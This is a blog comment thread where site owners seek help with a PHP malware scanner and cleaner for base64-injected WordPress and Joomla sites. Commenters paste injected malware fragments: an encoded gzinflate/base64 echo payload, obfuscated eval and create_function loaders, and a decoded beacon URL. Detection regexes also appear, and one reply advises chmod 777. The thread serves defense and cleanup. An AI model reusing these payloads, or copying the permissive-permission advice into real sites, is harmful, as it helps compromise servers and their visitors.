    Thanks tons!! I ran this on a clients site which has an enormous file volume. In the end there were 20k compromised files inspected and cleared. Life saver status Kudos to you!!

  61. Pingback: Hacked! » manyhighways

  62. Hello Paolo! I admire how you help people in trouble like me.

    Could you tell me what this script did to one of my sites: http://pastebin.com/AVfc8rt0

    I used some online tools to decrypt some parts (and founded some chmod’s there) but not sure of all, I cleaned (as far as I know) the site but want to know if the database was compromised.

    Thanks in advance!

  63. E says:

    My site is showing up a nasty “cialas” message as the description of my site in Google SERPs. Needless to say, this is not the description seen when you simply key in the site and go there. I thought the problem might be some sort of malware, so I ran cleaner 2.5 on my site and came up clean. Does this mean I can now eliminate malware as the source of the problem? Any ideas on what is causing this?

  64. Jawad says:

    Hi Paolo,

    Just today I have found that my server is all messed up with this eval(base64_decode trojan. I have tried to run your scanner (http://utilisbpo.info/cleaner_2.5.php) but it’s giving an error page. Can you please look into it? I have lot of sites of my clients hosted here.

    Thanks and regards,
    Jawad Khan

    eTek Studio
    http://www.etekstudio.com
    845-704-1900

    • Paolo says:

      Hello Jawad,

      Oh! you need to remove that immediately.
      Can you run it using the Shell terminal?

      I tried running the cleaner:
      http://www.utilisbpo.info/cleaner_2.5.php

      but it didn’t give me an error. It’s loading…
      Just wait until it finishes scanning all the files,
      don’t close the browser. When it finishes loading
      please send me the result.

      But I would suggest this running on Shell terminal or
      CLI cleaner version because it’s fast.

      Also, please don’t forget to backup your files.

      Let me know.

      Paolo

      • Jawad says:

        WOW, what a quick response. Really impressive.

        How to use shell terminal? I am not a developer.

        I have removed the file as you advised. When it was uploaded, it was showing some results (maybe 500-1000) files. But after few minutes, it was giving error message.

        Best regards,
        Jawad

        • Jawad says:

          From ‘removing that’, were you referring to virus or the file? I have removed the file. Please correct if I am wrong.

          Thanks and regards,
          Jawad Khan

          eTek Studio
          http://www.etekstudio.com
          845-704-1900

          • Paolo says:

            Hello Jawad,

            That’s good! I thought you’re not a developer.
            You don’t need to remove that manually. I was referring
            to use the cleaner script to remove the malware codes.

            But if you removed and the site is still working well
            that’s good.
            :)

          • Paolo says:

            I was referring to both of them. Some malicious codes are inserted in 1 file, most of them are inserted inside a normal php file.

            Just run the cleaner script it will do the job.
            :)

          • Jawad says:

            Hi Paolo,

            The script is working fine if I run it folder by folder. But if I put it on root, it’s giving 500 error. I realize that it’s because it has to scan thousands of files so it must be timing out.

            I have unlimited hosting plan through godaddy so this time out is kind of strange.

            Any suggestions? It will take days to clean by going in each folder. Is there any way I can run it through root?

            Thanks and regards,
            Jawad Khan

            eTek Studio
            http://www.etekstudio.com
            845-704-1900

          • Paolo says:

            Hello Jawad,

            I would suggest you use CLI version.

            You can access your server using SSH here’s the
            tutorial for godaddy:
            http://support.godaddy.com/help/article/4942

            If you have problems access it, please let me know.

            Thanks.

  65. Ali says:

    Hi Paolo
    My 5 sites have an eval(base64_decode(“etc etc Trojan in every theme index file and more. Dreamhost gave me a list. I found your excellent site and ran your Browser version of the cleaner on a couple of the sites and it worked, which was FANTASTIC:) Thanks so much. There were even more infected files than on Dreamhost’s list. However, this morning I’m back to square one. Could the problem be just that I didn’t do all the sites one after the other? I actually tried to do a couple of sites at a time, but this didn’t appear to work. Can you please advise?

    • Paolo says:

      Hi Ali,

      Yeah! I think the malware script resides on the other sites that you
      haven’t cleaned. Try to run the cleaner on the sites that you never
      cleaned before and then to the other sites. See if it will inject
      the malicious codes again.

      Also, please change your ftp & WP password.

      If problem still persists, run the malware scanner:
      http://www.php-beginners.com/wordpress-hack-malware-scanner.html
      send the scan result to info@php-beginners.com

      I’ll try to find the file that is causing the malicious codes to
      keep on coming back.

      Let me know. Thanks.

      Paolo :)

  66. sam lee says:

    Hi,
    500 internal error continue to occur, when I excute scanner.php and cleaner.php.
    I ran HTTP version.
    Please Please help me~~

    • Paolo says:

      Hi Sam,

      Did you ran them together at the same time? That’s not advisable
      especially on HTTP version.

      500 internal error is really very general error type of reporting.
      This means something has gone wrong inside your server, this maybe
      because of overload or something, because running scanner or cleaner
      in HTTP version consumes a lot of memory.

      If you still see 500 internal server error. Please contact your
      hosting support.

      I’m gonna be upgrading this so it wont happen again. Let me know.
      Keep you posted. Thanks.

      Paolo :)

  67. Erik says:

    Hi
    I have the god_mod trojan and it is a pain. The trojan have infected all my .php files. Your script can detect the infected files but cant clean them. Then I look at the file, some extra code (uuencoded) is added at the same row as the starting <?php. Is it possible to make a script that remove the row and add a new <?php. I use this script at the cli to detect the trojan (cant use php cli) or your web script.

    find . -exec grep -l "god_mod" {} \;

    Best Regards
    Erik

  68. sam lee says:

    Hi,

    I have cleaned two sites through ssh version.
    and I requested review to google. but rejected.

    Can you solve it after you check the log file I scanned?
    Let me know your email address.
    Thanks.

  69. sam lee says:

    Yes, I have cleaned my site using your tool(SSH version) and then I have requested for review to google.
    But rejected by google.
    I will send you scan log file(2 sites)
    Thanks.

  70. sam lee says:

    I sent you scan and clean logs.
    I want to be out of blacklist of google^^
    Thanks.

  71. John says:

    This is a real basic question. Where do I enter the shell script? In cPanel or on a local app that connects with my ftp. My blue host account was recently attacked and I did all the fixes manually and spent a few days fixing everything. I’ve read about using shell scripts but wasn’t sure where to input the code. I’m on a Mac using Lion if that means anything.

    Thanks for your help!

    John

  72. Peter says:

    Thank you for this Code. I’ve clear a complete Joomla-Installation. It was the second Time that the Malware infected all the php’s.

    Best Regards from Germany
    Peter

    • Paolo says:

      Thank you Peter. :) I’m it glad that the script helped you clean your site back again.
      Please do change your ftp and wp password and secure a backup of your clean files and db.

      Have a great day!

      Paolo :)

  73. John says:

    Thanks Pablo for your help! I was able to setup SSH for my account so I’m ready for action. I hope I never have to use it. But while I was at it I started using SFTP via Transmit FTP app and the performance is so much faster than using regular FTP. SFTP uses a secure port so it doesn’t have to negotiate a port number each time there is a request. Also with SFTP I’m now able to change directory and file permissions… I couldn’t do that using plain old FTP.

    Thanks!

    John

    • Paolo says:

      Wow, that’s a really helpful information John. Thanks for sharing it. :)
      SFTP is really a secure one. Thanks again John. Have a great day!

  74. Pingback: Automated Fix for WordPress base64_decode Injection in PHP Files « Blog de xkortazar

  75. Eric says:

    Hi, my site has been infected with the code below. This code is inserted in 30 or 40 php and html files. I have to removed it every 2 or 3 days and it constantly reappears. I ran your Cleaner and presently I don’t have any infected files but I know they will keep coming.

    I have changed my WordPress and ftp passwords.

    Many thanks for your help,
    Eric

    The code:

    #d93065#
    echo(gzinflate(base64_decode(“tVVNc9owEP0r………………aTx2nE4Mvo1VdZHr5G2d339mL9Cw==”)));
    #/d93065#

    • John says:

      You have to find the culprit… the files that are generating the malware code. Compare a healthy WordPress site by downloading the latest WP version and compare all the files and folders/directories. Usually the malware will add extra flies/folders inside wp-content directory. Naming will look like it belongs but once you compare sites you’ll see what doesn’t match. Also check all the index.php and .htaccess files for code that doesn’t belong… I found a .htaccess file in my root directory that was generating malware. Also change the file permissions to 444 on .htacess and index.php files.

      • Eric says:

        Hi,

        The same code keep coming but now it’s everyday and only on my index.html in the root.
        I checked the folders with Ultra Compare and did not find any extra files execpt for all the plug-in. There’s a lot of files witch is not like the original but I don’t know what to look for.

        This is my .htaccess file in the root. I don’t know if there’s a malicious code.

        # For security reasons, Option all cannot be overridden.
        #Options All -Indexes
        Options ExecCGI Includes IncludesNOEXEC SymLinksIfOwnerMatch -Indexes

        AddType text/cache-manifest .manifest

        AddType video/ogg .ogv
        AddType video/mp4 .mp4
        AddType video/webm .webm

        SetEnvIfNoCase Request_URI \.(og[gav]|mp4|m4a|webm)$ no-gzip dont-vary
        # BEGIN WordPress

        RewriteEngine On
        RewriteBase /
        RewriteRule ^index\.php$ – [L]
        RewriteCond %{REQUEST_FILENAME} !-f
        RewriteCond %{REQUEST_FILENAME} !-d
        RewriteRule . /index.php [L]

        # END WordPress

        Many thanks for help,
        Eric

  76. Angelos says:

    Thank you !!

  77. Eric says:

    Thank you, I’ll try that.

  78. Pingback: WordPress Hack : Malware Scanner | Komputer, Internet, Software Tips

  79. I copied the script to my server. Here’s the link http://Pulkit.me/scanner.php (or cleaner.php)

    It however, keeps on running. What should I do?

  80. Carlos says:

    Thanks for your work and for sharing it, Paolo. Does this this script work too for malware that seems to use some kind of fake “botanalitics” in WordPress installations? It injects php files with code that includes:

    base64_decode( ‘aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==’)

    which decodes to http://botstatisticupdate.com/stat/stat.php

    As I say, I think I’ve deleted all of the infected portions since they were on files changed on the very same date and time, so I think I could locate them all, but I am not sure what was the security flaw yet so I’m afraid it might reproduce itself… and a script for automatic elimination in the meantime might come in handy.

    • MYC says:

      I came across the
      base64_decode(‘aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==’)
      intrusion as well. In my case they got in via FTP. I sometimes use NetDrive for FTPing. I look after a bunch of VPS’s and shared web accounts. But only the accounts I had set up in NetDrive were compromised. The other VPS’s and shared web accounts were not touched, but all the ones I had setup login details in NetDrive were.

      They must have got a sniffer on my local PC.

    • MYC says:

      I had to add a new regex to the cleaner-cli script to pick out this attack:


      $aPattern = array(
      ""
      );

      I’m sure there is a much better regex string, but this did the trick for me.

      The injected code I was trying to match and remove:

      And thanks Paulo. My servers are clean again thanks to you.

  81. Ryan says:

    How long does the script take to run? And how do I know if it has worked? I’m fairly new at this, but have several sites that got hacked and are taking my visitors to porn.
    Thanks!

    • Paolo says:

      Wew, it takes Ryan 10-20 min on typical WordPress installation.
      If you have lots of php files that would really take time.

      Are you using CLI version? Let me know.

  82. Thanks for your cleaner.. really appreciate your work..
    what can be reg exp for this:

  83. i tried to paste the malware code but its not being saved. i saw you are using array for the patterns to find. i have few issues here. and i need the regx for that pattern.

    <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn...?>

  84. Cinema News says:

    Gr8 post Paolo, very useful to cleanup my blogs. Thank you so much :)

  85. tthdoc says:

    Paolo,

    I have been attacked by the base64_decode hack and read through this blog and was going to try this route. So the first thing I did was upload your cleaner and scanner files to my server root directory. Next opened puTTy. I copied your code for the scanner in the command line and get the following result.

    tail: cannot open `scanner_log’ for reading: No such file or directory
    tail: no files remaining

    This is my first time using shell access, so thanks for any suggestions…

    Doc

    • tthdoc says:

      I spoke with bluehost and was able to fix the problem. I had to change directory to public_html and now it is running. I know this was asked before as to time, and read that 10-20 minutes for a typical WP installation. I have 4 domains hosted on my site, with alot of php files. So how long should I give it to run before you would consider it too long. I was running it before and it stopped and said terminated. I was attributing (right or wrong) this to the fact that I had copied a file from one location to the other on the server while it was running. So I started it again. How long should I let it run … 1 hr, 12 hrs, more?

      Thanks,
      Doc

      • Paolo says:

        Typical wordpress installation would normally take up to 10 – 15 mins. The more php files you have the longer the script runs. :)

      • Carlos says:

        Just in case, I was hacked on bluehost + wordpress too (on april 30 th). Bluehost denies all responsibility and I believe them, but I haven’t found the original vulnerability in WordPress/plugins yet. I don’t know if your problem was the same as mine (see above). Maybe it would help to find a pattern (hosting provider, cms, plugins…).

        Speaking of everything, since I never got an answer to my question from Paolo (I wanted to know whether his script scans also for the specific infection I found or not), I ended up signing up for a paid premium service that scanned my site for malware, mysql injections, etc., and according to them, there were no more vulnerabilities or additional backdoors… and despite I haven’t changed/updated anything (everything was already updated in the first place) I haven’t been hacked again, so I’m really at a loss about what happened ???

        • Paolo says:

          Hello Carlos,

          Hackers nowadays are really pretty clever:

          1. they login to your server using vulnerability scripts
          2. if you login to your server using ftp in an infected computer – they can get in as well.
          3. brute force attack
          4. Hosting/Shared server is infected
          5. phishing attack
          6. XSS attack
          7. and a lot more…

          I’m not really sure how get in to your server. The only advice I can
          give to you now is:

          1. create a strong password both ftp and wordpress account.
          2. update your software
          3. if you think your computer is infected. Please do clean it up.
          4. Create a clean backup – because we don’t know when they will
          going to attack again.

          We cannot stop the attack because they’re creating and improving
          their ways to hack the only thing we can do for now is to prepare
          ourselves when that day happens.

          You can test my malware scanner:
          http://www.php-beginners.com/wordpress-hack-malware-scanner.html#id-download

          It scans most malware signatures that I know, but if you think that my scanner
          cannot detect the malware that’s in your site, please don’t hesitate to send it
          to me at info@php-beginners.com and I’ll create a way to detect it.

          I hope that helps.

          Have a great day!

          • Carlos says:

            Oh, thanks for your answer Paolo. Yes, I thought of everything you say, but it’s good to check that list again… In fact I think I’m going to make my password even stronger (I already changed it, but I’m going to change it again to a more complex one).

            I don’t think I had a virus in my desktop but yes, just in case, I even re-formatted my PC and reinstalled Windows, and of course changed my password. I’ve updated my antivirus to a full internet security suite (norton) just in case. I’ve stopped logging in to my control panel from my smartphone just in case the password was stolen through it. I have done all kind of paranoic things but haven’t been able to find nothing out of the ordinary.

            Of course I might be wrong but I think I have ruled out all the possible causes, and if I had to bet, my money would be on some inscure script/plugin on my WP installation. Also, it has to be something easily “scanned”, since I think I was attacked just because I was detected as vulnerable.

            Anyway. I’m sending you my old infected index.php file just in case. Maybe your script already detects it, I couldn’t really check because I had already removed it from the server when I uploaded your scanner, and I don’t want to put the file on the server again just to run the test, to minimise risks.

            Again thanks a lot for your time answering my question and again thanks for sharing your work and expertise.

  86. Norm says:

    I ran the .php file but I’m not really sure what I’m looking at. Could you take a look at the returned results and tell me what the next step is. I thought it would remove the code from the infected files but I’m not sure I’m using it right. http://vtm-dlp.com/wordpress/cleaner_2.8.php

    Thanks

    • Paolo says:

      Hello Norm,

      I checked ran the cleaner in your site and it has a warning:
      ————————————————————
      Warning: fopen(./wp-mail.php) [function.fopen]: failed to open stream: Permission denied in /home/content/n/o/r/normsfields/html/VTM/wordpress/cleaner_2.8.php on line 206
      ————————————————————

      Can you change the cleaner permission to 777 and run again the cleaner.

      Let me know. Thank you.

  87. Pingback: Blog被Hacked,修复方法 at live@haliluya

  88. Appears to have worked on my Joomla site as well! Many thanks!
    CH

  89. Let me first say “thanks” and “congrats” on a great piece of software.

    After I ran it, when I attempt to go to saac-arts.org from Google.com, it returns me to Google.com, with Russian links at the top, and “An unknown error” in the Search Bar.

    I have also run it on “HealthWorksFitnessCenter.com” with the same results.

    Thanks,
    CH

  90. Now, after running cleaner_2.8 on HealthWorksFitnessCenter.com it redirects to the regular Google.com site.

  91. Pingback: VeryBig.org » Recent WordPress Hack Attack (including eval base64decode) Resolved

  92. Aaron says:

    Hi,

    I’m getting a 500 and 404 error using html scanner on Dreamhost. I do not have shell access.

    Anything I may try?

    Thank you!

    Aaron

    “500 Internal Server Error

    The server encountered an internal error or misconfiguration and was unable to complete your request.

    Please contact the server administrator, webmaster@ and inform them of the time the error occurred, and anything you might have done that may have caused the error.

    More information about this error may be available in the server error log.

    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.”

  93. Denea says:

    Hi,

    I think the program worked.. it’s created a cleaner log file… but how do you know when it’s finished running? And do I need to do anything with the cleaner log file? Are the viruses still there or did it clean them permanently?

    Thanks again

  94. Victòria Peñafiel says:

    Hi Paolo,

    Been here once already and made a donation. I’ve recently ran your cleaner script again (unlucky me!).

    Anyway, this is just a short note to say THANK YOU for keeping the script up to date. I’m sure you’re helping dozens of people in trouble like me.

    • Paolo says:

      Yes, thank you for your donation before Victoria. I’m always updating the script.
      Well, I’ll just keep you posted. Hope you’ll not be attacked again.

      I checked your site and it’s really a very good looking site and unique. :)

      Thanks again.

  95. Greg says:

    Hi Paolo,

    I seem to have picked up a nasty script which has been added to every .php file in my hosting account. It has appended this at the top of each index.php file:
    “”; echo “”;

    Do you think you could send me an e-mail if you are able to create me a script which can clean this up? I will make a donation of course! :)

    Thanks,
    Greg

  96. Pingback: New Panda/Penguin Update Deciphered? | The Hoist | An SEO Link Building Service For Everyone

  97. Faheem says:

    Hello Dear Admin, I am getting an base64 code virus is all my php files as well as all the js and dev.js files have [x73/63/…. (something like that) in the end of every js files, please do let me know any way through which i can delete these two codes from all my wordpress files.
    Thanks
    Please email me the tip as well as any script for this.

  98. RW says:

    I have been infected by malware on all of my sites. I’ve tried installing the cleaner_2.9.php on my server and it redirects to another link or nothing happens. What am I doing wrong?

  99. RW says:

    I can’t tell if its working or not. Is it just a blank screen for 10-15mins?

  100. Alberte Zato says:

    Hello Paulo,

    New to this.

    I put the ,php on the root and it keeps saying.. “waiting for ibertrainz.eu” ?????

    What Am I doing wrong?

    THank you,

    Alberte

  101. Alberte Zato says:

    Infection came back. Which is next step? I’ve scanned it with your scanner php script.

    Thank you.

  102. Alberte Zato says:

    Only four index.php files are infected!!!!!!!!!!!!!!!

    4 Found Infected Files

    ./foro2/index.php
    ./foro2/Packages/index.php
    ./foro2/Sources/index.php
    ./downloads/index.php

    It’s a nuisance every 30 thirty minutos or so!

    Any hint, please?

    THank you.

    Alberte

  103. Kenneth says:

    Hello!

    I think my joomla sites have been infected. I have tried this cleaner. But it don’t seems to fix my problems.
    When I push the link to see the infected files. It does not happen anything.

    Any advice?

  104. We have used before your clean script.
    And worked fine.
    Now we have a new hacked site but the clean doesnt work on the infected index-file.

    here is the content of the infected index file:
    It forward to: sweepstakesandcontestsdo.com

    mark( ‘afterLoad’ ) : null;

    /**
    * CREATE THE APPLICATION
    *
    * NOTE :
    */
    $mainframe =& JFactory::getApplication(‘site’);

    /**
    * INITIALISE THE APPLICATION
    *
    * NOTE :
    */
    // set the language
    $mainframe->initialise();

    JPluginHelper::importPlugin(‘system’);

    // trigger the onAfterInitialise events
    JDEBUG ? $_PROFILER->mark(‘afterInitialise’) : null;
    $mainframe->triggerEvent(‘onAfterInitialise’);

    /**
    * ROUTE THE APPLICATION
    *
    * NOTE :
    */
    $mainframe->route();

    // authorization
    $Itemid = JRequest::getInt( ‘Itemid’);
    $mainframe->authorize($Itemid);

    // trigger the onAfterRoute events
    JDEBUG ? $_PROFILER->mark(‘afterRoute’) : null;
    $mainframe->triggerEvent(‘onAfterRoute’);

    /**
    * DISPATCH THE APPLICATION
    *
    * NOTE :
    */
    $option = JRequest::getCmd(‘option’);
    $mainframe->dispatch($option);

    // trigger the onAfterDispatch events
    JDEBUG ? $_PROFILER->mark(‘afterDispatch’) : null;
    $mainframe->triggerEvent(‘onAfterDispatch’);

    /**
    * RENDER THE APPLICATION
    *
    * NOTE :
    */
    $mainframe->render();

    // trigger the onAfterRender events
    JDEBUG ? $_PROFILER->mark(‘afterRender’) : null;
    $mainframe->triggerEvent(‘onAfterRender’);

    /**
    * RETURN THE RESPONSE
    */
    echo JResponse::toString($mainframe->getCfg(‘gzip’));

  105. Jordi Plana says:

    Hello Paolo,
    Thanks for the cleaner and the scanner it works like a charm!
    I’m hosting my site in hostmonster and every day I have to run the cleaner because I keep getting hacked (eval trojan).
    I updated all timthumb files in every site I have with no luck. I don’t know what to do…
    Can you give an advise on finding the vulnerability?

  106. Gino says:

    Thanks a lot!!!!!! Your script it’s GREAT and WORKING GREAT!!!
    Solved all my problem THANKS AGAIN GUYS!!!!

  107. Meysam says:

    Hi Paulo,
    Recently my website’s joomla client have been infected by a similar malware script. I’m really in emergency to find a way to fix it. But I’m wondering what should I do?

    http://www.pgforum.net/scanner_2.6.php
    http://www.pgforum.net/cleaner_2.9.php
    Thank you

    • Paolo says:

      Here’s what you should going to do.

      1. Back up all your joomla files.
      2. Run Malware Scanner
      3. Run Cleaner
      4. Change Joomla and DB password.
      5. Send the scan and cleaner result to me.

      Let me know.

      • Meysam says:

        After Run Cleaner
        0 Found Infected Files
        but after Run Malware Scanner
        ./index.php
        -long_text – create_function(‘$’.'v’,$ad[7].$ad[9].$ad[1].$ad[1
        -long_text - FZdFssUIckWX01WhgZjC4YGYmTVxiOGJWVq9f2/hQt6T1ZUN/z

        * ./LICENSE.php
        -long_text - create_function('$'.'v',$ad[15].$ad[22].$ad[4].$ad
        -long_text – DZdHDqzYEkSX0++JAd7pqwd4700Bkxbem8LD6n+t4N4MnYyILM

        * ./COPYRIGHT.php
        -long_text – create_function(‘$’.'v’,$ad[18].$ad[10].$ad[6].$ad
        -long_text – DZe1rsZKEoQfZ++VAzNpIzMzO1kZfzPz0+8JJhtp1N1VX9dUVz

        * ./CREDITS.php
        -long_text – create_function(‘$’.'v’,$ad[9].$ad[22].$ad[1].$ad[
        -long_text – DZbFysYKtkQfp88hg7hx6UHc3TNp4i5fPHn6+483bIpaUFXVlY
        .
        .
        .

        full result Send email – info@php-beginners.com

        Thank

        • Paolo says:

          Hello Meysam,

          Thanks for using my script. Those are really a malware codes.
          You need to clean those files.

          Paolo

  108. Gelo says:

    Your script works fine :) thank you very much with so much respect :) greetings from greece! you save me. ;D

  109. Steve says:

    Hi,

    It looks like the cleaner worked! Grand thanks!!! However when running the scan I get this:

    ./wp-includes-copy/js/codepress
    * ./wp-includes-copy/js/codepress/codepress.js
    -eval – eval(id+’ = new CodePress(t[i]
    -eval – eval(id

    ./wp-includes-copy/js/codepress/engines/

    200 OK

    OK
    The server encountered an internal error or
    misconfiguration and was unable to complete
    your request.
    Please contact the server administrator
    and inform them of the time the error occurred,
    and anything you might have done that may have
    caused the error.
    More information about this error may be available
    in the server error log.

    Apache Server at cdlworkshop.com Port 80

    Is this normal?

    =-Steve

    • Paolo says:

      Hello Steve,

      That’s not normal. I’m not really what happened. Can you try running the scanner again?
      See if it still show up an error? Maybe it’s just your server. :)

      Let me know. Paolo

  110. Hey exceptional website! Does running a blog similar to this require a large amount of work?
    I have no understanding of programming however I had been hoping to start my own blog soon.
    Anyhow, should you have any ideas or techniques for new blog owners please share.
    I know this is off topic but I simply had to ask.
    Thank you!

  111. Cosy says:

    HI,

    My site is infected and i run the cleaner but its not removed any base 64 codes. So i just send the full log to info@php-beginners.com pls check and update your file.
    ————–code——————-
    #c3284d#
    echo(gzinflate(base64_decode(“TctJCoAwDEDRq5QcoNmL9i7pQG3pRBpFb6/gxu37/HU6TkOU3CNsIOESzHTSp6AKtXhQfNNfJ7sNdpGxIIZquScfuFLTrldNB/maGpYUd7H90nmCMit+s3kA”)));
    #/c3284d#

    ———————————————————-
    Cosy

  112. Cosy says:

    got this error?

    Fatal error: Allowed memory size of 67108864 bytes exhausted (tried to allocate 76826 bytes) in /home/embroide/public_html/scanner_2.6.php on line 239

  113. Cosy says:

    HI,

    Some how cleaner not cleaning the php files? run the scanner found following

    ./
    * ./index.php
    -long_text – +————————————————-
    -long_text – base64_decode(“TctJCoAwDEDRq5QcoNmL9i7pQG3pRBpFb6/

  114. mcosy says:

    HI,

    How to find this malware code ?

    #c3284d#
    echo(gzinflate(base64_decode(“TctJCoAwDEDRq5QcoNmL9i7pQG3pRBpFb6/gxu37/HU6TkOU3CNsIOESzHTSp6AKtXhQfNNfJ7sNdpGxIIZquScfuFLTrldNB/maGpYUd7H90nmCMit+s3kA”)));
    #/c3284d#

  115. Kyle says:

    Thank you!! Your cleaner worked like a charm!! What a nasty bug.

  116. Pingback: CCO. Alerts Page « support for www.catholic-church.org sites

  117. Rosh says:

    Hi.

    my site got infected with loads of nasty stuffs.
    I am a bit relieved that i reach your website. Have run the scanner_2.6.php file via ssh.
    in my server side, i discovered that a scanner_log is created, but shows a 0kb at the beginning.
    Is this normal ?

  118. Fabiano says:

    I found this in some sites :

  119. Billy says:

    I´m trying to clean our site, but the code keeps infecting the site faster than it can be cleaned.
    I figured out that´s because some of the folders on the server contain thousands of subfolders with textfiles in them (log folders, temp folders and those types of folders), and the scan of those folders take too long. A scan takes more than 24 hours.

    Is there a way to exclude a folder from the scan?

    I am talking both of your clean script and your scanner script.
    If that is possible, I can exclude those folders that I know for certain can not contain any malicious code, including some sites that don´t have any php files in them at all.

  120. Paul says:

    My site was infected by the following malicious code:

    I ran the cleaner script but it didn’t detect anything, is it because the pattern of this malicious code is a little different?
    Thanks for answer…

  121. Paul says:

    try again to post the code

    php /**/ eval(base64_decode("aWYoZnV......"));

  122. Paul says:

    Sorry for lots of posts…just want to share some feedback in my case.
    I tried both cleaner-cli_2.10.php and cleaner_2.10.php, they cannot detect the type B. Trojan malicious code in my site.
    I finally make the script work by changing to:

    $find = "\s*eval\(base64_decode\([\"'][^\"']{255,}[\"']\)\);";

    Really grateful for the author and all the previous posts, thanks.

  123. Noé Facq says:

    HI everyone,
    I’m a french blogger and I’m not sure to well understand the trix:
    -I put the cleaner_2.10.php to the root of my site
    And I tried to run the script browsing this url http://www.astuces-argent.net/cleaner_2.10.php
    in google chrome but I had a 404 page instead.
    Should I try the cleaner-cli_2.10 instead.

    Surely I made a mistake I can’t Imagine
    regards,
    Noé

  124. Pingback: Free Website Malware Scanner | Digi ads development

  125. Alex says:

    Thank You for good works.
    some injection used strrev() function.
    and also need search ‘edoced_46esab’ (or other pattern) which transformed into ‘base64_decode’.
    Now I have one site on WP with injected code into wp_head() function.
    Site work only with disabled wp_head, I try switch off add_action wp_head one by one in default-filters.php but script with frames not going away. Still trying find.

  126. Pingback: Virus Appending Base64 Code to All PHP files - Web Design London

  127. daniel says:

    recently i found a script injection on my web server which contains more than 2 gb of websites on it

    the malicious code is like so :

    is there a way the scanner can monitor it too ? so i can remove it without breaking of the websites design or intergrity

    thank you

    daniel

  128. XXX says:

    Hi,

    I believe you need to add also the following in the $aPattern variable of the cleaner,
    “\s*eval\(gzinflate\(base64_decode\([\"'][^\"']{255,}[\"']\)\)\);”,

  129. Pingback: Automated Fix for Wordpress base64_decode Injection in PHP Files • Raymond.CC

Leave a Reply

Your email address will not be published. Required fields are marked *


*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>